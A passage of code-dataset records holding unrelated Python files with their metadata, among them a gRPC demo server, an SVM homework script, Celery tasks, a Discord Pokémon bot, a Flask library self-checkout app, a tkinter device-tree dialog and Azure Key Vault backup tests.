print(i, ' >>>>>>>>', reponse, time.time() - t)\r\n \r\n tm2 = time.time()\r\n \r\n print('all time: ', tm2-tm1)\r\n \r\ndef server():\r\n srv = grpc.server(futures.ThreadPoolExecutor(max_workers=(8)))\r\n chat_pb2_grpc.add_GreeterServicer_to_server(Greeter(), srv)\r\n chat_pb2_grpc.add_CalcServicer_to_server(Calc(), srv)\r\n# route_database_pb2_grpc.add_RouteGreeterServicer_to_server(Route(), srv)\r\n srv.add_insecure_port('[::]:50052')\r\n srv.start()\r\n\r\n try:\r\n while True:\r\n print('looping')\r\n time.sleep(_ONE_DAY_IN_SECONDS)\r\n except KeyboardInterrupt:\r\n srv.stop(0)\r\n\r\ndef main():\r\n opts, _ = getopt.getopt(sys.argv[1:], 'ht:')\r\n t = ''\r\n for op, v in opts:\r\n if op == '-t':\r\n t = v\r\n\r\n if t == 's':\r\n server()\r\n elif t == 'c':\r\n client()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "python/grpc_demo/server/main.py", "file_name": "main.py", 
"file_ext": "py", "file_size_in_byte": 3667, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "chat_pb2_grpc.CalcServicer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "chat_pb2.Result", "line_number": 32, "usage_type": "call"}, {"api_name": "chat_pb2.Result", "line_number": 35, "usage_type": "call"}, {"api_name": "chat_pb2.Result", "line_number": 38, "usage_type": "call"}, {"api_name": "chat_pb2_grpc.GreeterServicer", "line_number": 40, "usage_type": "attribute"}, {"api_name": "chat_pb2.HelloReply", "line_number": 43, "usage_type": "call"}, {"api_name": "route_database_pb2_grpc.RouteGreeterServicer", "line_number": 46, "usage_type": "attribute"}, {"api_name": "route_db.read_route_database", "line_number": 50, "usage_type": "call"}, {"api_name": "grpc.insecure_channel", "line_number": 70, "usage_type": "call"}, {"api_name": "chat_pb2_grpc.GreeterStub", "line_number": 71, "usage_type": "call"}, {"api_name": "chat_pb2_grpc.CalcStub", "line_number": 73, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "chat_pb2.Value", "line_number": 88, "usage_type": "call"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "grpc.server", "line_number": 104, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 104, "usage_type": "call"}, {"api_name": "concurrent.futures", "line_number": 104, "usage_type": "name"}, {"api_name": "chat_pb2_grpc.add_GreeterServicer_to_server", "line_number": 105, "usage_type": "call"}, {"api_name": "chat_pb2_grpc.add_CalcServicer_to_server", "line_number": 106, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "getopt.getopt", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}]}
+{"seq_id": "278135300", "text": "# -*- coding: utf-8 -*-\n\nimport csv\nimport cvxpy as cp\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntrain_data =[]\nwith open(\"hw04_sample_vectors.csv\", \"r\") as csv_file:\n reader = csv.reader(csv_file, delimiter=',') \n for data in reader:\n train_data.append(data) \ncsv_file.close()\n\nlabel =[]\nwith open(\"hw04_labels.csv\", \"r\") as csv_file: \n reader = csv.reader(csv_file, delimiter=',') \n for data in reader:\n label.append(data) \ncsv_file.close()\n\nfor data in label:\n if np.linalg.norm(data) == 0:\n data[0] = -1\n \nx2 = np.arange(-0.6, 0.4, 0.01)\n \ndef plot_graph(name, omega, omega_0):\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.scatter(train_data[:1000, 0], train_data[:1000, 1], c='b', s=3)\n ax1.scatter(train_data[1000:, 0], train_data[1000:, 1], c='r', s=3)\n x1 = (-1*omega[1]*x2 - omega_0) / omega[0]\n ax1.plot(x1, x2, 'g-')\n ax1.set_xlabel('x1')\n ax1.set_ylabel('x2')\n fig.savefig('hw4_2_c_{}.pdf'.format(name))\n \nlabel = np.asarray(label, dtype=np.float32)\ntrain_data = np.asarray(train_data, dtype=np.float32)\n#one_arr = np.ones(train_data.shape[0])\n#one_arr = np.resize(one_arr, (train_data.shape[0], 1))\n#train_data = np.concatenate((train_data, one_arr), axis=1)\n\nomega = cp.Variable(2)\nomega_0 = cp.Variable(1)\n\nobjective = cp.Minimize(cp.norm(omega))\nconstraints = [label[i] * (omega.T * train_data[i] + omega_0) >= 1 \n for i in range(len(label))]\nprob = cp.Problem(objective, constraints)\n\nresult = prob.solve()\n\nprint(omega.value)\nprint(omega_0.value)\n\nplot_graph('1', omega.value, omega_0.value)", "sub_path": "ECE59500/hw4/svm_hard.py", "file_name": "svm_hard.py", "file_ext": "py", "file_size_in_byte": 1649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "csv.reader", "line_number": 10, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cvxpy.Variable", "line_number": 45, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 46, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 48, "usage_type": "call"}, {"api_name": "cvxpy.norm", "line_number": 48, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "573722788", "text": "import json, os\nfrom bson import ObjectId, Regex\n\n\nclass Utils:\n\n def __init__(self, db):\n self.db = db\n\n def store_ids(self, admin_email, id_list):\n\n self.db.files.update(\n {'admin_email': admin_email},\n {'admin_email': admin_email, 'id_list': id_list},\n upsert=True\n )\n\n def remove_ids(self, email):\n\n print('--remove_ids--')\n\n obj = self.db.files.find_one({\"admin_email\": email})\n \n print(obj)\n if obj:\n\n col_names = self.db.collection_names()\n\n print(obj)\n\n if col_names:\n\n for name in col_names:\n\n for id in obj['id_list']:\n\n try:\n self.db[name].delete_one({\n '_id': ObjectId(id)\n })\n\n print('Deleted %s : %s' % (name, id))\n\n except:\n pass\n\n # self.db.files.remove({'_id': ObjectId(obj['_id'])})\n # x = self.db.users.remove({'email': obj['admin_email']})\n # print(x)\n", "sub_path": "api_gateway/api/models/Utils.py", "file_name": "Utils.py", "file_ext": "py", "file_size_in_byte": 1154, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "bson.ObjectId", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "168471545", "text": "from __future__ import absolute_import\nfrom django.conf import settings\nfrom celery.utils.log import get_task_logger\n\nfrom biostar import const\nfrom datetime import timedelta\n\nlogger = get_task_logger(__name__)\n\nfrom celery import Celery\n\napp = Celery('biostar')\n\n# Read the configuration from the config file.\napp.config_from_object(settings.CELERY_CONFIG)\n\n# Discover tasks in applications.\napp.autodiscover_tasks(\n lambda: [\"biostar.mailer\"]\n)\n\n@app.task\ndef data_cleanup(days=1, weeks=20):\n \"Reduces messages and post views\"\n\n from biostar.apps.posts.models import PostView\n from biostar.apps.messages.models import Message\n\n # Reduce post views.\n past = const.now() - timedelta(days=days)\n query = PostView.objects.filter(date__lt=past)\n msg = \"Deleting %s PostViews\" % query.count()\n logger.info(msg)\n query.delete()\n\n # Reduce messages.\n since = const.now() - timedelta(weeks=weeks)\n query = Message.objects.filter(sent_at__lt=since)\n msg = \"Deleting %s messages\" % query.count()\n logger.info(msg)\n query.delete()\n\n\n@app.task\ndef test(*args, **kwds):\n logger.info(\"*** executing task %s %s, %s\" % (__name__, args, kwds))\n return 1000\n\n\n\n", "sub_path": "biostar/celery.py", "file_name": "celery.py", "file_ext": "py", "file_size_in_byte": 1198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "celery.utils.log.get_task_logger", "line_number": 8, "usage_type": "call"}, {"api_name": "celery.Celery", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.settings.CELERY_CONFIG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 15, "usage_type": "name"}, {"api_name": "biostar.const.now", "line_number": 30, "usage_type": "call"}, {"api_name": "biostar.const", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 30, "usage_type": "call"}, {"api_name": "biostar.apps.posts.models.PostView.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "biostar.apps.posts.models.PostView.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "biostar.apps.posts.models.PostView", "line_number": 31, "usage_type": "name"}, {"api_name": "biostar.const.now", "line_number": 37, "usage_type": "call"}, {"api_name": "biostar.const", "line_number": 37, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 37, "usage_type": "call"}, {"api_name": "biostar.apps.messages.models.Message.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "biostar.apps.messages.models.Message.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "biostar.apps.messages.models.Message", "line_number": 38, "usage_type": "name"}]}
+{"seq_id": "573980623", "text": "import os\nimport sys\nimport time\nfrom asyncio import sleep, ensure_future\n\nimport discord\nimport pandas as pd\nimport jaconv\n\n\nclass Pokemon(discord.Client):\n def __init__(self):\n super(Pokemon, self).__init__()\n\n self.table = pd.read_csv(\n './pokemon.tsv', sep='\\t', dtype=str\n ).fillna(\"\")\n self.table['No.str'] = \\\n self.table['No.'].apply(lambda x: f'No.{x}')\n\n self.table_moves = pd.read_csv(\n './pokemon_moves.tsv', sep='\\t', dtype=str\n ).fillna(\"\")\n self.table_moves_katakana_lower = \\\n self.table_moves.applymap(\n lambda name: jaconv.hira2kata(name.lower())\n )\n\n async def on_message(self, message):\n if len(message.content) == 0:\n return\n\n content = message.content.lower()\n content_normalized = jaconv.hira2kata(content[0].upper() + content[1:])\n\n if content_normalized == 'No.???':\n return\n\n # filter pokemon list\n match = self.table[\n self.table.drop(columns='No.').applymap(\n lambda name: name == content_normalized\n ).any(axis=1)\n ]\n if len(match) != 0:\n # display 1st pokemon of filtered list (expected that only 1 item has been extracted)\n match = match.drop(columns='No.str')\n matchseq = match.iloc[0]\n embed = format_pokeinfo(zip(matchseq.index, matchseq))\n await message.channel.send(embed=embed)\n\n # filter move(waza) list\n content_normalized_lower = content_normalized.lower()\n match_moves = self.table_moves[\n self.table_moves_katakana_lower.applymap(\n lambda name: name == content_normalized_lower\n ).any(axis=1)\n ]\n if len(match_moves) != 0:\n # display 1st move of filtered list (expected that only 1 item has been extracted)\n matchseq_moves = match_moves.iloc[0]\n embed = format_pokeinfo(zip(matchseq_moves.index, matchseq_moves))\n await message.channel.send(embed=embed)\n\n\ndef format_pokeinfo(index_value_seq):\n name_jp = 'NO DATA'\n description = ''\n for index, value in index_value_seq:\n if index in ['日', '🇯🇵']:\n if value == '':\n continue\n name_jp = value\n continue\n description += (\n f'{index} [NO DATA]\\n'\n if value == '' else\n f'{index} `{value}`\\n'\n )\n title = name_jp\n description = description[:-1]\n return discord.Embed(title=title, description=description)\n\n\nif __name__ == '__main__':\n print(\"sudawoodo has started\")\n poke = Pokemon()\n poke.run(os.getenv('DISCORD_BOT_TOKEN'))\n", "sub_path": "sudawoodo.py", "file_name": "sudawoodo.py", "file_ext": "py", "file_size_in_byte": 2761, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "discord.Client", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "jaconv.hira2kata", "line_number": 26, "usage_type": "call"}, {"api_name": "jaconv.hira2kata", "line_number": 34, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 82, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "141534568", "text": "import sys\n\nfrom flask import Flask, Response, request\nimport requests \nimport json\n\nfrom settings import *\n\n\nLOAN_XML = \"\"\"\n \n {}\n {}\n \n\"\"\".format(CIRC_DESK, LIB_NAME)\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef root():\n return app.send_static_file('self-check.html')\n\n\n@app.route('/login//')\ndef login(userid, lastname):\n url = \"{}/users/{}\".format(API_URL, userid)\n params = {}\n params['apiKey'] = API_KEY\n params['expand'] = \"loans,requests,fees\"\n params['format'] = \"json\"\n response = requests.get(url, params=params)\n if response.json().get(\"last_name\").lower() == lastname.lower():\n if response.status_code == 200:\n return Response(response, mimetype=\"application/json\")\n else:\n return Response('Incorrect Login
Try Again', 500)\n else:\n return Response('Incorrect Login
Try Again', 401)\n\n\n@app.route('/checkout//')\ndef loan(userid, barcode):\n # test to see if book is already checked out\n barcodeurl = \"{}/items\".format(API_URL)\n params = {'apiKey': API_KEY,\n 'item_barcode': barcode,\n 'format': 'json'}\n redirect = requests.get(barcodeurl, params=params, allow_redirects=True)\n url = redirect.url\n url, _ = url.split('?')\n url = '{}/loans'.format(url)\n\n # del params['item_barcode']\n loans_response = requests.get(url, params=params)\n already_checked_out = loans_response.json().get('item_loan', False)\n\n # error handling\n if already_checked_out:\n return Response('This item is already checked out', 409)\n if loans_response.status_code == 404:\n return Response('Error: Invalid Barcode', 404)\n\n # Checkout the item\n url = \"{}/users/{}/loans\".format(API_URL, userid)\n headers = {'Content-Type': 'application/xml', 'dataType': \"xml\"}\n response = requests.post(url, params=params, headers=headers, data=LOAN_XML)\n if response.status_code == 400 and \"reference\" in redirect.text.lower():\n return Response('Cannot Checkout: Reference Materials', 403)\n if response.status_code == 400 and \"non-circulating\" in redirect.text.lower():\n return Response('Cannot Checkout: Reserve Materials', 403)\n if response.status_code == 400 and \"loan limit\" in response.text.lower():\n return Response('Item cannot be loaned due to loan limit being reached', 411)\n return Response(response, mimetype=\"application/json\")\n\n\nif __name__ == \"__main__\":\n app.run()\n", "sub_path": "selfcheckout.py", "file_name": "selfcheckout.py", "file_ext": "py", "file_size_in_byte": 2595, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 50, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 63, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "623738114", "text": "__all__ = [\n \"DeviceTreeWidget\"\n]\n\nfrom .var_widgets import (\n VarTreeview,\n VarButton,\n VarLabelFrame\n)\nfrom qemu import (\n qvd_get\n)\nfrom six.moves.tkinter_ttk import (\n Scrollbar\n)\nfrom six.moves.tkinter import (\n Radiobutton,\n StringVar\n)\nfrom common import (\n mlget as _\n)\nfrom .gui_dialog import (\n GUIDialog\n)\n\nclass DeviceTreeWidget(GUIDialog):\n def __init__(self, root, *args, **kw):\n GUIDialog.__init__(self, master = root, *args, **kw)\n self.qom_type_var = root.qom_type_var\n\n self.title(_(\"Device Tree\"))\n self.grid()\n \n self.columnconfigure(0, weight = 1)\n self.rowconfigure(0, weight = 1)\n\n self.columnconfigure(2, minsize = 200)\n\n self.attributes(\"-topmost\", 1)\n geom = \"+\" + str(int(root.winfo_rootx())) \\\n + \"+\" + str(int(root.winfo_rooty()))\n self.geometry(geom)\n\n self.focus()\n\n self.device_tree = VarTreeview(self)\n self.device_tree[\"columns\"] = (\"Macros\")\n\n self.device_tree.heading(\"#0\", text = _(\"Devices\"))\n self.device_tree.heading(\"Macros\", text = _(\"Macros\"))\n\n self.device_tree.bind(\"\", self.on_b1_press_dt)\n\n self.device_tree.grid(\n row = 0,\n column = 0,\n sticky = \"NEWS\"\n )\n\n #Add Scrollbar\n ysb = Scrollbar(self,\n orient = \"vertical\",\n command = self.device_tree.yview\n )\n xsb = Scrollbar(self,\n orient = \"horizontal\",\n command = self.device_tree.xview\n )\n self.device_tree['yscroll'] = ysb.set\n self.device_tree['xscroll'] = xsb.set\n ysb.grid(row = 0, column = 1, sticky = \"NS\")\n xsb.grid(row = 1, column = 0, sticky = \"EW\")\n\n self.add_button = VarButton(\n self,\n text = _(\"Select\"),\n command = self.on_select_qom_type\n )\n self.add_button.grid(row = 1, column = 2, sticky = \"WE\")\n self.add_button.config(state = \"disabled\")\n\n self.fr = VarLabelFrame(self, text = _(\"Select QOM type\"))\n self.fr.grid(row = 0, column = 2, sticky = \"SEWN\")\n\n # Check exception before __init__ call.\n bp = root.mach.project.build_path\n qvd = qvd_get(bp, version = root.mach.project.target_version)\n # the QOM type of roots[0] is \"device\"\n roots = qvd.qvc.device_tree[0][\"children\"]\n self.qom_create_tree(\"\", roots)\n\n def qom_create_tree(self, parent_id, dt_list):\n dt_list.sort(key = lambda x: x[\"type\"])\n for dict_dt in dt_list:\n if \"macro\" in dict_dt:\n value = \"\"\n for macro in dict_dt[\"macro\"]:\n value = value + \" \" + macro\n else:\n value= \"None\"\n tr_id = self.device_tree.insert(parent_id, \"end\",\n text = dict_dt[\"type\"],\n values = value\n )\n if \"children\" in dict_dt:\n self.qom_create_tree(tr_id, dict_dt[\"children\"])\n\n def on_select_qom_type(self):\n self.qom_type_var.set(self.v.get())\n self.destroy()\n\n # write selected qom type in qom_type_var\n def on_b1_press_dt(self, event):\n item = self.device_tree.identify('item', event.x, event.y)\n if item:\n self.add_button.config(state = \"active\")\n for widget in self.fr.winfo_children():\n widget.destroy()\n\n dt_type = self.device_tree.item(item, \"text\")\n self.v = StringVar()\n self.v.set(dt_type) # initialize\n\n b = Radiobutton(self.fr,\n text = dt_type, \n variable = self.v,\n value = dt_type\n )\n b.pack(anchor = \"w\")\n\n macros = self.device_tree.item(item, \"values\")[0]\n if not macros == \"None\":\n l = macros.split(\" \")\n for mstr in l:\n b = Radiobutton(\n self.fr,\n text = mstr, \n variable = self.v,\n value = mstr\n )\n b.pack(anchor = \"w\")\n\n b.select()\n", "sub_path": "widgets/device_tree_widget.py", "file_name": 
"device_tree_widget.py", "file_ext": "py", "file_size_in_byte": 4233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "gui_dialog.GUIDialog", "line_number": 27, "usage_type": "name"}, {"api_name": "gui_dialog.GUIDialog.__init__", "line_number": 29, "usage_type": "call"}, {"api_name": "gui_dialog.GUIDialog", "line_number": 29, "usage_type": "name"}, {"api_name": "common.mlget", "line_number": 32, "usage_type": "call"}, {"api_name": "var_widgets.VarTreeview", "line_number": 47, "usage_type": "call"}, {"api_name": "common.mlget", "line_number": 50, "usage_type": "call"}, {"api_name": "common.mlget", "line_number": 51, "usage_type": "call"}, {"api_name": "six.moves.tkinter_ttk.Scrollbar", "line_number": 62, "usage_type": "call"}, {"api_name": "six.moves.tkinter_ttk.Scrollbar", "line_number": 66, "usage_type": "call"}, {"api_name": "var_widgets.VarButton", "line_number": 75, "usage_type": "call"}, {"api_name": "common.mlget", "line_number": 77, "usage_type": "call"}, {"api_name": "var_widgets.VarLabelFrame", "line_number": 83, "usage_type": "call"}, {"api_name": "common.mlget", "line_number": 83, "usage_type": "call"}, {"api_name": "qemu.qvd_get", "line_number": 88, "usage_type": "call"}, {"api_name": "six.moves.tkinter.StringVar", "line_number": 122, "usage_type": "call"}, {"api_name": "six.moves.tkinter.Radiobutton", "line_number": 125, "usage_type": "call"}, {"api_name": "six.moves.tkinter.Radiobutton", "line_number": 136, "usage_type": "call"}]}
+{"seq_id": "74428294", "text": "# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom functools import partial\nimport time\n\nfrom azure.core.credentials import AccessToken\nfrom azure.core.exceptions import ResourceExistsError\nfrom azure.identity import DefaultAzureCredential\nfrom azure.keyvault.keys import KeyClient\nfrom azure.keyvault.administration._internal import HttpChallengeCache\nfrom azure.keyvault.administration import KeyVaultBackupClient\nfrom azure.keyvault.administration._internal import parse_folder_url\nfrom devtools_testutils import ResourceGroupPreparer, StorageAccountPreparer\nimport pytest\nfrom six.moves.urllib_parse import urlparse\n\nfrom _shared.helpers import mock\nfrom _shared.test_case import KeyVaultTestCase\nfrom blob_container_preparer import BlobContainerPreparer\n\n\n@pytest.mark.usefixtures(\"managed_hsm\")\nclass BackupClientTests(KeyVaultTestCase):\n def __init__(self, *args, **kwargs):\n super(BackupClientTests, self).__init__(*args, match_body=False, **kwargs)\n\n def setUp(self, *args, **kwargs):\n if self.is_live:\n real = urlparse(self.managed_hsm[\"url\"])\n playback = urlparse(self.managed_hsm[\"playback_url\"])\n self.scrubber.register_name_pair(real.netloc, playback.netloc)\n super(BackupClientTests, self).setUp(*args, **kwargs)\n\n def tearDown(self):\n HttpChallengeCache.clear()\n assert len(HttpChallengeCache._cache) == 0\n super(KeyVaultTestCase, self).tearDown()\n\n @property\n def credential(self):\n if self.is_live:\n return DefaultAzureCredential()\n return mock.Mock(get_token=lambda *_, **__: AccessToken(\"secret\", time.time() + 3600))\n\n @ResourceGroupPreparer(random_name_enabled=True, use_cache=True)\n @StorageAccountPreparer(random_name_enabled=True)\n @BlobContainerPreparer()\n def test_full_backup_and_restore(self, container_uri, sas_token):\n # backup the vault\n backup_client = KeyVaultBackupClient(self.managed_hsm[\"url\"], self.credential)\n backup_poller = backup_client.begin_backup(container_uri, sas_token)\n backup_operation = backup_poller.result()\n assert backup_operation.folder_url\n\n # restore the backup\n restore_poller = backup_client.begin_restore(backup_operation.folder_url, sas_token)\n restore_poller.wait()\n\n @ResourceGroupPreparer(random_name_enabled=True, use_cache=True)\n @StorageAccountPreparer(random_name_enabled=True)\n @BlobContainerPreparer()\n def test_full_backup_and_restore_rehydration(self, container_uri, sas_token):\n if not self.is_live:\n pytest.skip(\"Poller requests are incompatible with vcrpy in playback\")\n\n # backup the vault\n backup_client = KeyVaultBackupClient(self.managed_hsm[\"url\"], self.credential)\n backup_poller = backup_client.begin_backup(container_uri, sas_token)\n\n # create a new poller from a continuation token\n token = backup_poller.continuation_token()\n rehydrated = backup_client.begin_backup(container_uri, sas_token, continuation_token=token)\n\n rehydrated_operation = rehydrated.result()\n assert rehydrated_operation.folder_url\n backup_operation = backup_poller.result()\n assert backup_operation.folder_url == rehydrated_operation.folder_url\n\n # restore the backup\n restore_poller = backup_client.begin_restore(backup_operation.folder_url, sas_token)\n\n # create a new poller from a continuation token\n token = restore_poller.continuation_token()\n rehydrated = backup_client.begin_restore(backup_operation.folder_url, sas_token, 
continuation_token=token)\n\n rehydrated.wait()\n restore_poller.wait()\n\n @ResourceGroupPreparer(random_name_enabled=True, use_cache=True)\n @StorageAccountPreparer(random_name_enabled=True)\n @BlobContainerPreparer()\n def test_selective_key_restore(self, container_uri, sas_token):\n # create a key to selectively restore\n key_client = KeyClient(self.managed_hsm[\"url\"], self.credential)\n key_name = self.get_resource_name(\"selective-restore-test-key\")\n key_client.create_rsa_key(key_name)\n\n # backup the vault\n backup_client = KeyVaultBackupClient(self.managed_hsm[\"url\"], self.credential)\n backup_poller = backup_client.begin_backup(container_uri, sas_token)\n backup_operation = backup_poller.result()\n\n # restore the key\n restore_poller = backup_client.begin_restore(backup_operation.folder_url, sas_token, key_name=key_name)\n restore_poller.wait()\n\n # delete the key\n delete_function = partial(key_client.begin_delete_key, key_name)\n delete_poller = self._poll_until_no_exception(delete_function, ResourceExistsError)\n delete_poller.wait()\n key_client.purge_deleted_key(key_name)\n\n @ResourceGroupPreparer(random_name_enabled=True, use_cache=True)\n @StorageAccountPreparer(random_name_enabled=True)\n @BlobContainerPreparer()\n def test_backup_client_polling(self, container_uri, sas_token):\n if not self.is_live:\n pytest.skip(\"Poller requests are incompatible with vcrpy in playback\")\n\n # backup the vault\n backup_client = KeyVaultBackupClient(self.managed_hsm[\"url\"], self.credential)\n backup_poller = backup_client.begin_backup(container_uri, sas_token)\n\n # create a new poller from a continuation token\n token = backup_poller.continuation_token()\n rehydrated = backup_client.begin_backup(container_uri, sas_token, continuation_token=token)\n\n # check that pollers and polling methods behave as expected\n assert backup_poller.status() == \"InProgress\"\n assert not backup_poller.done() or backup_poller.polling_method().finished()\n assert rehydrated.status() == \"InProgress\"\n assert not rehydrated.done() or rehydrated.polling_method().finished()\n\n backup_operation = backup_poller.result()\n assert backup_poller.status() == \"Succeeded\" and backup_poller.polling_method().status() == \"Succeeded\"\n rehydrated_operation = rehydrated.result()\n assert rehydrated.status() == \"Succeeded\" and rehydrated.polling_method().status() == \"Succeeded\"\n assert backup_operation.folder_url == rehydrated_operation.folder_url\n\n # rehydrate a poller with a continuation token of a completed operation\n late_rehydrated = backup_client.begin_backup(container_uri, sas_token, continuation_token=token)\n assert late_rehydrated.status() == \"Succeeded\"\n\n # restore the backup\n restore_poller = backup_client.begin_restore(backup_operation.folder_url, sas_token)\n\n # create a new poller from a continuation token\n token = restore_poller.continuation_token()\n rehydrated = backup_client.begin_restore(backup_operation.folder_url, sas_token, continuation_token=token)\n\n # check that pollers and polling methods behave as expected\n assert restore_poller.status() == \"InProgress\"\n assert not restore_poller.done() or restore_poller.polling_method().finished()\n assert rehydrated.status() == \"InProgress\"\n assert not rehydrated.done() or rehydrated.polling_method().finished()\n\n rehydrated.wait()\n assert rehydrated.status() == \"Succeeded\" and rehydrated.polling_method().status() == \"Succeeded\"\n restore_poller.wait()\n assert restore_poller.status() == \"Succeeded\" and 
restore_poller.polling_method().status() == \"Succeeded\"\n\n\n@pytest.mark.parametrize(\n \"url,expected_container_url,expected_folder_name\",\n [\n (\n \"https://account.blob.core.windows.net/backup/mhsm-account-2020090117323313\",\n \"https://account.blob.core.windows.net/backup\",\n \"mhsm-account-2020090117323313\",\n ),\n (\"https://account.storage/account/storage\", \"https://account.storage/account\", \"storage\"),\n (\"https://account.storage/a/b/c\", \"https://account.storage/a\", \"b/c\"),\n (\"https://account.storage/a/b-c\", \"https://account.storage/a\", \"b-c\"),\n ],\n)\ndef test_parse_folder_url(url, expected_container_url, expected_folder_name):\n container_url, folder_name = parse_folder_url(url)\n assert container_url == expected_container_url\n assert folder_name == expected_folder_name\n", "sub_path": "sdk/keyvault/azure-keyvault-administration/tests/test_backup_client.py", "file_name": "test_backup_client.py", "file_ext": "py", "file_size_in_byte": 8407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "_shared.test_case.KeyVaultTestCase", "line_number": 25, "usage_type": "name"}, {"api_name": "six.moves.urllib_parse.urlparse", "line_number": 31, "usage_type": "call"}, {"api_name": "six.moves.urllib_parse.urlparse", "line_number": 32, "usage_type": "call"}, {"api_name": "azure.keyvault.administration._internal.HttpChallengeCache.clear", "line_number": 37, "usage_type": "call"}, {"api_name": "azure.keyvault.administration._internal.HttpChallengeCache", "line_number": 37, "usage_type": "name"}, {"api_name": "azure.keyvault.administration._internal.HttpChallengeCache._cache", "line_number": 38, "usage_type": "attribute"}, {"api_name": "azure.keyvault.administration._internal.HttpChallengeCache", "line_number": 38, "usage_type": "name"}, {"api_name": "_shared.test_case.KeyVaultTestCase", "line_number": 39, "usage_type": "argument"}, {"api_name": "azure.identity.DefaultAzureCredential", "line_number": 44, "usage_type": "call"}, {"api_name": "_shared.helpers.mock.Mock", "line_number": 45, "usage_type": "call"}, {"api_name": "_shared.helpers.mock", "line_number": 45, "usage_type": "name"}, {"api_name": "azure.core.credentials.AccessToken", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 45, "usage_type": "call"}, {"api_name": "azure.keyvault.administration.KeyVaultBackupClient", "line_number": 52, "usage_type": "call"}, {"api_name": "devtools_testutils.ResourceGroupPreparer", "line_number": 47, "usage_type": "call"}, {"api_name": "devtools_testutils.StorageAccountPreparer", "line_number": 48, "usage_type": "call"}, {"api_name": "blob_container_preparer.BlobContainerPreparer", "line_number": 49, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 66, "usage_type": "call"}, {"api_name": 